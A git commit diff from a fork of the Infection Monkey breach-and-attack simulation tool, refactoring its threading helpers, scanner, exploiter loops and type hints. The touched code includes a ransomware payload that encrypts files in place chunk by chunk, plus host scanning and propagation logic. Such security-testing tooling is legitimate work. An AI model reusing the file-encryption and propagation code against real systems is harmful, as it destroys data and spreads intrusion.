forked from p34709852/monkey
Merge pull request #1682 from guardicore/small-code-improvements
Small code improvements
This commit is contained in:
commit
f478444bb7
|
@ -1,7 +1,7 @@
|
||||||
import logging
|
import logging
|
||||||
import threading
|
import threading
|
||||||
import time
|
import time
|
||||||
from typing import Any, Callable, Dict, List, Tuple
|
from typing import Any, Callable, Dict, Iterable, List, Tuple
|
||||||
|
|
||||||
from infection_monkey.i_control_channel import IControlChannel, IslandCommunicationError
|
from infection_monkey.i_control_channel import IControlChannel, IslandCommunicationError
|
||||||
from infection_monkey.i_master import IMaster
|
from infection_monkey.i_master import IMaster
|
||||||
|
@ -11,10 +11,10 @@ from infection_monkey.network import NetworkInterface
|
||||||
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
||||||
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
from infection_monkey.telemetry.post_breach_telem import PostBreachTelem
|
||||||
from infection_monkey.telemetry.system_info_telem import SystemInfoTelem
|
from infection_monkey.telemetry.system_info_telem import SystemInfoTelem
|
||||||
|
from infection_monkey.utils.threading import create_daemon_thread, interruptable_iter
|
||||||
from infection_monkey.utils.timer import Timer
|
from infection_monkey.utils.timer import Timer
|
||||||
|
|
||||||
from . import Exploiter, IPScanner, Propagator
|
from . import Exploiter, IPScanner, Propagator
|
||||||
from .threading_utils import create_daemon_thread
|
|
||||||
|
|
||||||
CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC = 5
|
CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC = 5
|
||||||
CHECK_FOR_TERMINATE_INTERVAL_SEC = CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC / 5
|
CHECK_FOR_TERMINATE_INTERVAL_SEC = CHECK_ISLAND_FOR_STOP_COMMAND_INTERVAL_SEC / 5
|
||||||
|
@ -182,7 +182,7 @@ class AutomatedMaster(IMaster):
|
||||||
command, result = self._puppet.run_pba(name, options)
|
command, result = self._puppet.run_pba(name, options)
|
||||||
self._telemetry_messenger.send_telemetry(PostBreachTelem(name, command, result))
|
self._telemetry_messenger.send_telemetry(PostBreachTelem(name, command, result))
|
||||||
|
|
||||||
def _can_propagate(self):
|
def _can_propagate(self) -> bool:
|
||||||
return True
|
return True
|
||||||
|
|
||||||
def _run_payload(self, payload: Tuple[str, Dict]):
|
def _run_payload(self, payload: Tuple[str, Dict]):
|
||||||
|
@ -191,15 +191,14 @@ class AutomatedMaster(IMaster):
|
||||||
|
|
||||||
self._puppet.run_payload(name, options, self._stop)
|
self._puppet.run_payload(name, options, self._stop)
|
||||||
|
|
||||||
def _run_plugins(self, plugin: List[Any], plugin_type: str, callback: Callable[[Any], None]):
|
def _run_plugins(
|
||||||
|
self, plugins: Iterable[Any], plugin_type: str, callback: Callable[[Any], None]
|
||||||
|
):
|
||||||
logger.info(f"Running {plugin_type}s")
|
logger.info(f"Running {plugin_type}s")
|
||||||
logger.debug(f"Found {len(plugin)} {plugin_type}(s) to run")
|
logger.debug(f"Found {len(plugins)} {plugin_type}(s) to run")
|
||||||
|
|
||||||
for p in plugin:
|
|
||||||
if self._stop.is_set():
|
|
||||||
logger.debug(f"Received a stop signal, skipping remaining {plugin_type}s")
|
|
||||||
return
|
|
||||||
|
|
||||||
|
interrupted_message = f"Received a stop signal, skipping remaining {plugin_type}s"
|
||||||
|
for p in interruptable_iter(plugins, self._stop, interrupted_message):
|
||||||
callback(p)
|
callback(p)
|
||||||
|
|
||||||
logger.info(f"Finished running {plugin_type}s")
|
logger.info(f"Finished running {plugin_type}s")
|
||||||
|
|
|
@ -7,8 +7,7 @@ from typing import Callable, Dict, List
|
||||||
|
|
||||||
from infection_monkey.i_puppet import ExploiterResultData, IPuppet
|
from infection_monkey.i_puppet import ExploiterResultData, IPuppet
|
||||||
from infection_monkey.model import VictimHost
|
from infection_monkey.model import VictimHost
|
||||||
|
from infection_monkey.utils.threading import interruptable_iter, run_worker_threads
|
||||||
from .threading_utils import run_worker_threads
|
|
||||||
|
|
||||||
QUEUE_TIMEOUT = 2
|
QUEUE_TIMEOUT = 2
|
||||||
|
|
||||||
|
@ -75,10 +74,7 @@ class Exploiter:
|
||||||
results_callback: Callback,
|
results_callback: Callback,
|
||||||
stop: Event,
|
stop: Event,
|
||||||
):
|
):
|
||||||
for exploiter in exploiters_to_run:
|
for exploiter in interruptable_iter(exploiters_to_run, stop):
|
||||||
if stop.is_set():
|
|
||||||
break
|
|
||||||
|
|
||||||
exploiter_name = exploiter["name"]
|
exploiter_name = exploiter["name"]
|
||||||
exploiter_results = self._run_exploiter(exploiter_name, victim_host, stop)
|
exploiter_results = self._run_exploiter(exploiter_name, victim_host, stop)
|
||||||
results_callback(exploiter_name, victim_host, exploiter_results)
|
results_callback(exploiter_name, victim_host, exploiter_results)
|
||||||
|
|
|
@ -13,9 +13,9 @@ from infection_monkey.i_puppet import (
|
||||||
PortStatus,
|
PortStatus,
|
||||||
)
|
)
|
||||||
from infection_monkey.network import NetworkAddress
|
from infection_monkey.network import NetworkAddress
|
||||||
|
from infection_monkey.utils.threading import interruptable_iter, run_worker_threads
|
||||||
|
|
||||||
from . import IPScanResults
|
from . import IPScanResults
|
||||||
from .threading_utils import run_worker_threads
|
|
||||||
|
|
||||||
logger = logging.getLogger()
|
logger = logging.getLogger()
|
||||||
|
|
||||||
|
@ -49,25 +49,23 @@ class IPScanner:
|
||||||
self, addresses: Queue, options: Dict, results_callback: Callback, stop: Event
|
self, addresses: Queue, options: Dict, results_callback: Callback, stop: Event
|
||||||
):
|
):
|
||||||
logger.debug(f"Starting scan thread -- Thread ID: {threading.get_ident()}")
|
logger.debug(f"Starting scan thread -- Thread ID: {threading.get_ident()}")
|
||||||
|
icmp_timeout = options["icmp"]["timeout_ms"] / 1000
|
||||||
|
tcp_timeout = options["tcp"]["timeout_ms"] / 1000
|
||||||
|
tcp_ports = options["tcp"]["ports"]
|
||||||
|
|
||||||
try:
|
try:
|
||||||
while not stop.is_set():
|
while not stop.is_set():
|
||||||
address = addresses.get_nowait()
|
address = addresses.get_nowait()
|
||||||
ip = address.ip
|
logger.info(f"Scanning {address.ip}")
|
||||||
logger.info(f"Scanning {ip}")
|
|
||||||
|
|
||||||
icmp_timeout = options["icmp"]["timeout_ms"] / 1000
|
ping_scan_data = self._puppet.ping(address.ip, icmp_timeout)
|
||||||
ping_scan_data = self._puppet.ping(ip, icmp_timeout)
|
port_scan_data = self._scan_tcp_ports(address.ip, tcp_ports, tcp_timeout, stop)
|
||||||
|
|
||||||
tcp_timeout = options["tcp"]["timeout_ms"] / 1000
|
|
||||||
tcp_ports = options["tcp"]["ports"]
|
|
||||||
port_scan_data = self._scan_tcp_ports(ip, tcp_ports, tcp_timeout, stop)
|
|
||||||
|
|
||||||
fingerprint_data = {}
|
fingerprint_data = {}
|
||||||
if IPScanner.port_scan_found_open_port(port_scan_data):
|
if IPScanner.port_scan_found_open_port(port_scan_data):
|
||||||
fingerprinters = options["fingerprinters"]
|
fingerprinters = options["fingerprinters"]
|
||||||
fingerprint_data = self._run_fingerprinters(
|
fingerprint_data = self._run_fingerprinters(
|
||||||
ip, fingerprinters, ping_scan_data, port_scan_data, stop
|
address.ip, fingerprinters, ping_scan_data, port_scan_data, stop
|
||||||
)
|
)
|
||||||
|
|
||||||
scan_results = IPScanResults(ping_scan_data, port_scan_data, fingerprint_data)
|
scan_results = IPScanResults(ping_scan_data, port_scan_data, fingerprint_data)
|
||||||
|
@ -87,10 +85,7 @@ class IPScanner:
|
||||||
) -> Dict[int, PortScanData]:
|
) -> Dict[int, PortScanData]:
|
||||||
port_scan_data = {}
|
port_scan_data = {}
|
||||||
|
|
||||||
for p in ports:
|
for p in interruptable_iter(ports, stop):
|
||||||
if stop.is_set():
|
|
||||||
break
|
|
||||||
|
|
||||||
port_scan_data[p] = self._puppet.scan_tcp_port(ip, p, timeout)
|
port_scan_data[p] = self._puppet.scan_tcp_port(ip, p, timeout)
|
||||||
|
|
||||||
return port_scan_data
|
return port_scan_data
|
||||||
|
@ -109,10 +104,7 @@ class IPScanner:
|
||||||
) -> Dict[str, FingerprintData]:
|
) -> Dict[str, FingerprintData]:
|
||||||
fingerprint_data = {}
|
fingerprint_data = {}
|
||||||
|
|
||||||
for f in fingerprinters:
|
for f in interruptable_iter(fingerprinters, stop):
|
||||||
if stop.is_set():
|
|
||||||
break
|
|
||||||
|
|
||||||
fingerprint_data[f] = self._puppet.fingerprint(f, ip, ping_scan_data, port_scan_data)
|
fingerprint_data[f] = self._puppet.fingerprint(f, ip, ping_scan_data, port_scan_data)
|
||||||
|
|
||||||
return fingerprint_data
|
return fingerprint_data
|
||||||
|
|
|
@ -16,9 +16,9 @@ from infection_monkey.network.scan_target_generator import compile_scan_target_l
|
||||||
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
from infection_monkey.telemetry.exploit_telem import ExploitTelem
|
||||||
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
||||||
from infection_monkey.telemetry.scan_telem import ScanTelem
|
from infection_monkey.telemetry.scan_telem import ScanTelem
|
||||||
|
from infection_monkey.utils.threading import create_daemon_thread
|
||||||
|
|
||||||
from . import Exploiter, IPScanner, IPScanResults
|
from . import Exploiter, IPScanner, IPScanResults
|
||||||
from .threading_utils import create_daemon_thread
|
|
||||||
|
|
||||||
logger = logging.getLogger()
|
logger = logging.getLogger()
|
||||||
|
|
||||||
|
@ -107,9 +107,8 @@ class Propagator:
|
||||||
victim_host.os["type"] = ping_scan_data.os
|
victim_host.os["type"] = ping_scan_data.os
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def _process_tcp_scan_results(victim_host: VictimHost, port_scan_data: PortScanData) -> bool:
|
def _process_tcp_scan_results(victim_host: VictimHost, port_scan_data: PortScanData):
|
||||||
for psd in port_scan_data.values():
|
for psd in filter(lambda psd: psd.status == PortStatus.OPEN, port_scan_data.values()):
|
||||||
if psd.status == PortStatus.OPEN:
|
|
||||||
victim_host.services[psd.service] = {}
|
victim_host.services[psd.service] = {}
|
||||||
victim_host.services[psd.service]["display_name"] = "unknown(TCP)"
|
victim_host.services[psd.service]["display_name"] = "unknown(TCP)"
|
||||||
victim_host.services[psd.service]["port"] = psd.port
|
victim_host.services[psd.service]["port"] = psd.port
|
||||||
|
|
|
@ -1,17 +0,0 @@
|
||||||
from threading import Thread
|
|
||||||
from typing import Callable, Tuple
|
|
||||||
|
|
||||||
|
|
||||||
def run_worker_threads(target: Callable[..., None], args: Tuple = (), num_workers: int = 2):
|
|
||||||
worker_threads = []
|
|
||||||
for i in range(0, num_workers):
|
|
||||||
t = create_daemon_thread(target=target, args=args)
|
|
||||||
t.start()
|
|
||||||
worker_threads.append(t)
|
|
||||||
|
|
||||||
for t in worker_threads:
|
|
||||||
t.join()
|
|
||||||
|
|
||||||
|
|
||||||
def create_daemon_thread(target: Callable[..., None], args: Tuple = ()):
|
|
||||||
return Thread(target=target, args=args, daemon=True)
|
|
|
@ -28,17 +28,12 @@ class InPlaceFileEncryptor:
|
||||||
|
|
||||||
def _encrypt_file(self, filepath: Path):
|
def _encrypt_file(self, filepath: Path):
|
||||||
with open(filepath, "rb+") as f:
|
with open(filepath, "rb+") as f:
|
||||||
data = f.read(self._chunk_size)
|
for data in iter(lambda: f.read(self._chunk_size), b""):
|
||||||
while data:
|
|
||||||
num_bytes_read = len(data)
|
|
||||||
|
|
||||||
encrypted_data = self._encrypt_bytes(data)
|
encrypted_data = self._encrypt_bytes(data)
|
||||||
|
|
||||||
f.seek(-num_bytes_read, 1)
|
f.seek(-len(encrypted_data), 1)
|
||||||
f.write(encrypted_data)
|
f.write(encrypted_data)
|
||||||
|
|
||||||
data = f.read(self._chunk_size)
|
|
||||||
|
|
||||||
def _add_extension(self, filepath: Path):
|
def _add_extension(self, filepath: Path):
|
||||||
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
|
new_filepath = filepath.with_suffix(f"{filepath.suffix}{self._new_file_extension}")
|
||||||
filepath.rename(new_filepath)
|
filepath.rename(new_filepath)
|
||||||
|
|
|
@ -5,6 +5,7 @@ from typing import Callable, List
|
||||||
|
|
||||||
from infection_monkey.telemetry.file_encryption_telem import FileEncryptionTelem
|
from infection_monkey.telemetry.file_encryption_telem import FileEncryptionTelem
|
||||||
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
from infection_monkey.telemetry.messengers.i_telemetry_messenger import ITelemetryMessenger
|
||||||
|
from infection_monkey.utils.threading import interruptable_iter
|
||||||
|
|
||||||
from .consts import README_FILE_NAME, README_SRC
|
from .consts import README_FILE_NAME, README_SRC
|
||||||
from .ransomware_options import RansomwareOptions
|
from .ransomware_options import RansomwareOptions
|
||||||
|
@ -53,13 +54,10 @@ class Ransomware:
|
||||||
def _encrypt_files(self, file_list: List[Path], interrupt: threading.Event):
|
def _encrypt_files(self, file_list: List[Path], interrupt: threading.Event):
|
||||||
logger.info(f"Encrypting files in {self._target_directory}")
|
logger.info(f"Encrypting files in {self._target_directory}")
|
||||||
|
|
||||||
for filepath in file_list:
|
interrupted_message = (
|
||||||
if interrupt.is_set():
|
"Received a stop signal, skipping remaining files for encryption of ransomware payload"
|
||||||
logger.debug(
|
|
||||||
"Received a stop signal, skipping remaining files for encryption of "
|
|
||||||
"ransomware payload"
|
|
||||||
)
|
)
|
||||||
return
|
for filepath in interruptable_iter(file_list, interrupt, interrupted_message):
|
||||||
try:
|
try:
|
||||||
logger.debug(f"Encrypting {filepath}")
|
logger.debug(f"Encrypting {filepath}")
|
||||||
self._encrypt_file(filepath)
|
self._encrypt_file(filepath)
|
||||||
|
@ -73,11 +71,11 @@ class Ransomware:
|
||||||
self._telemetry_messenger.send_telemetry(encryption_attempt)
|
self._telemetry_messenger.send_telemetry(encryption_attempt)
|
||||||
|
|
||||||
def _leave_readme_in_target_directory(self, interrupt: threading.Event):
|
def _leave_readme_in_target_directory(self, interrupt: threading.Event):
|
||||||
try:
|
|
||||||
if interrupt.is_set():
|
if interrupt.is_set():
|
||||||
logger.debug("Received a stop signal, skipping leave readme")
|
logger.debug("Received a stop signal, skipping leave readme")
|
||||||
return
|
return
|
||||||
|
|
||||||
|
try:
|
||||||
self._leave_readme(README_SRC, self._readme_file_path)
|
self._leave_readme(README_SRC, self._readme_file_path)
|
||||||
except Exception as ex:
|
except Exception as ex:
|
||||||
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
|
logger.warning(f"An error occurred while attempting to leave a README.txt file: {ex}")
|
||||||
|
|
|
@ -6,7 +6,9 @@ def get_all_regular_files_in_directory(dir_path: Path) -> List[Path]:
|
||||||
return filter_files(dir_path.iterdir(), [lambda f: f.is_file()])
|
return filter_files(dir_path.iterdir(), [lambda f: f.is_file()])
|
||||||
|
|
||||||
|
|
||||||
def filter_files(files: Iterable[Path], file_filters: List[Callable[[Path], bool]]):
|
def filter_files(
|
||||||
|
files: Iterable[Path], file_filters: Iterable[Callable[[Path], bool]]
|
||||||
|
) -> List[Path]:
|
||||||
filtered_files = files
|
filtered_files = files
|
||||||
for file_filter in file_filters:
|
for file_filter in file_filters:
|
||||||
filtered_files = [f for f in filtered_files if file_filter(f)]
|
filtered_files = [f for f in filtered_files if file_filter(f)]
|
||||||
|
@ -14,16 +16,16 @@ def filter_files(files: Iterable[Path], file_filters: List[Callable[[Path], bool
|
||||||
return filtered_files
|
return filtered_files
|
||||||
|
|
||||||
|
|
||||||
def file_extension_filter(file_extensions: Set):
|
def file_extension_filter(file_extensions: Set) -> Callable[[Path], bool]:
|
||||||
def inner_filter(f: Path):
|
def inner_filter(f: Path) -> bool:
|
||||||
return f.suffix in file_extensions
|
return f.suffix in file_extensions
|
||||||
|
|
||||||
return inner_filter
|
return inner_filter
|
||||||
|
|
||||||
|
|
||||||
def is_not_symlink_filter(f: Path):
|
def is_not_symlink_filter(f: Path) -> bool:
|
||||||
return not f.is_symlink()
|
return not f.is_symlink()
|
||||||
|
|
||||||
|
|
||||||
def is_not_shortcut_filter(f: Path):
|
def is_not_shortcut_filter(f: Path) -> bool:
|
||||||
return f.suffix != ".lnk"
|
return f.suffix != ".lnk"
|
||||||
|
|
|
@ -0,0 +1,44 @@
|
||||||
|
import logging
|
||||||
|
from threading import Event, Thread
|
||||||
|
from typing import Any, Callable, Iterable, Tuple
|
||||||
|
|
||||||
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
|
||||||
|
def run_worker_threads(target: Callable[..., None], args: Tuple = (), num_workers: int = 2):
|
||||||
|
worker_threads = []
|
||||||
|
for i in range(0, num_workers):
|
||||||
|
t = create_daemon_thread(target=target, args=args)
|
||||||
|
t.start()
|
||||||
|
worker_threads.append(t)
|
||||||
|
|
||||||
|
for t in worker_threads:
|
||||||
|
t.join()
|
||||||
|
|
||||||
|
|
||||||
|
def create_daemon_thread(target: Callable[..., None], args: Tuple = ()):
|
||||||
|
return Thread(target=target, args=args, daemon=True)
|
||||||
|
|
||||||
|
|
||||||
|
def interruptable_iter(
|
||||||
|
iterator: Iterable, interrupt: Event, log_message: str = None, log_level: int = logging.DEBUG
|
||||||
|
) -> Any:
|
||||||
|
"""
|
||||||
|
Wraps an iterator so that the iterator can be interrupted if the `interrupt` Event is set. This
|
||||||
|
is a convinient way to make loops interruptable and avoids the need to add an `if` to each and
|
||||||
|
every loop.
|
||||||
|
:param Iterable iterator: An iterator that will be made interruptable.
|
||||||
|
:param Event interrupt: A `threading.Event` that, if set, will prevent the remainder of the
|
||||||
|
iterator's items from being processed.
|
||||||
|
:param str log_message: A message to be logged if the iterator is interrupted. If `log_message`
|
||||||
|
is `None` (default), then no message is logged.
|
||||||
|
:param int log_level: The log level at which to log `log_message`, defaults to `logging.DEBUG`.
|
||||||
|
"""
|
||||||
|
for i in iterator:
|
||||||
|
if interrupt.is_set():
|
||||||
|
if log_message:
|
||||||
|
logger.log(log_level, log_message)
|
||||||
|
|
||||||
|
break
|
||||||
|
|
||||||
|
yield i
|
|
@ -1,5 +1,8 @@
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
|
from types import MappingProxyType as ImmutableMapping
|
||||||
|
from typing import Mapping
|
||||||
|
|
||||||
from common.utils.file_utils import expand_path
|
from common.utils.file_utils import expand_path
|
||||||
from monkey_island.cc.server_utils.consts import (
|
from monkey_island.cc.server_utils.consts import (
|
||||||
DEFAULT_CRT_PATH,
|
DEFAULT_CRT_PATH,
|
||||||
|
@ -19,10 +22,7 @@ _LOG_LEVEL = "log_level"
|
||||||
|
|
||||||
|
|
||||||
class IslandConfigOptions:
|
class IslandConfigOptions:
|
||||||
def __init__(self, config_contents: dict = None):
|
def __init__(self, config_contents: Mapping[str, Mapping] = ImmutableMapping({})):
|
||||||
if config_contents is None:
|
|
||||||
config_contents = {}
|
|
||||||
|
|
||||||
self.data_dir = DEFAULT_DATA_DIR
|
self.data_dir = DEFAULT_DATA_DIR
|
||||||
self.log_level = DEFAULT_LOG_LEVEL
|
self.log_level = DEFAULT_LOG_LEVEL
|
||||||
self.start_mongodb = DEFAULT_START_MONGO_DB
|
self.start_mongodb = DEFAULT_START_MONGO_DB
|
||||||
|
@ -33,7 +33,7 @@ class IslandConfigOptions:
|
||||||
|
|
||||||
self.update(config_contents)
|
self.update(config_contents)
|
||||||
|
|
||||||
def update(self, config_contents: dict):
|
def update(self, config_contents: Mapping[str, Mapping]):
|
||||||
self.data_dir = config_contents.get(_DATA_DIR, self.data_dir)
|
self.data_dir = config_contents.get(_DATA_DIR, self.data_dir)
|
||||||
|
|
||||||
self.log_level = config_contents.get(_LOG_LEVEL, self.log_level)
|
self.log_level = config_contents.get(_LOG_LEVEL, self.log_level)
|
||||||
|
|
|
@ -117,7 +117,12 @@ def test_interrupt_while_encrypting(
|
||||||
mfe.assert_any_call(ransomware_test_data / HELLO_TXT)
|
mfe.assert_any_call(ransomware_test_data / HELLO_TXT)
|
||||||
|
|
||||||
|
|
||||||
def test_no_readme_after_interrupt(ransomware, interrupt, mock_leave_readme):
|
def test_no_readme_after_interrupt(
|
||||||
|
ransomware_options, build_ransomware, interrupt, mock_leave_readme
|
||||||
|
):
|
||||||
|
ransomware_options.readme_enabled = True
|
||||||
|
ransomware = build_ransomware(ransomware_options)
|
||||||
|
|
||||||
interrupt.set()
|
interrupt.set()
|
||||||
ransomware.run(interrupt)
|
ransomware.run(interrupt)
|
||||||
|
|
||||||
|
|
|
@ -0,0 +1,47 @@
|
||||||
|
import logging
|
||||||
|
from threading import Event
|
||||||
|
|
||||||
|
from infection_monkey.utils.threading import create_daemon_thread, interruptable_iter
|
||||||
|
|
||||||
|
|
||||||
|
def test_create_daemon_thread():
|
||||||
|
thread = create_daemon_thread(lambda: None)
|
||||||
|
assert thread.daemon
|
||||||
|
|
||||||
|
|
||||||
|
def test_interruptable_iter():
|
||||||
|
interrupt = Event()
|
||||||
|
items_from_iterator = []
|
||||||
|
test_iterator = interruptable_iter(range(0, 10), interrupt, "Test iterator was interrupted")
|
||||||
|
|
||||||
|
for i in test_iterator:
|
||||||
|
items_from_iterator.append(i)
|
||||||
|
if i == 3:
|
||||||
|
interrupt.set()
|
||||||
|
|
||||||
|
assert items_from_iterator == [0, 1, 2, 3]
|
||||||
|
|
||||||
|
|
||||||
|
def test_interruptable_iter_not_interrupted():
|
||||||
|
interrupt = Event()
|
||||||
|
items_from_iterator = []
|
||||||
|
test_iterator = interruptable_iter(range(0, 5), interrupt, "Test iterator was interrupted")
|
||||||
|
|
||||||
|
for i in test_iterator:
|
||||||
|
items_from_iterator.append(i)
|
||||||
|
|
||||||
|
assert items_from_iterator == [0, 1, 2, 3, 4]
|
||||||
|
|
||||||
|
|
||||||
|
def test_interruptable_iter_interrupted_before_used():
|
||||||
|
interrupt = Event()
|
||||||
|
items_from_iterator = []
|
||||||
|
test_iterator = interruptable_iter(
|
||||||
|
range(0, 5), interrupt, "Test iterator was interrupted", logging.INFO
|
||||||
|
)
|
||||||
|
|
||||||
|
interrupt.set()
|
||||||
|
for i in test_iterator:
|
||||||
|
items_from_iterator.append(i)
|
||||||
|
|
||||||
|
assert not items_from_iterator
|
Loading…
Reference in New Issue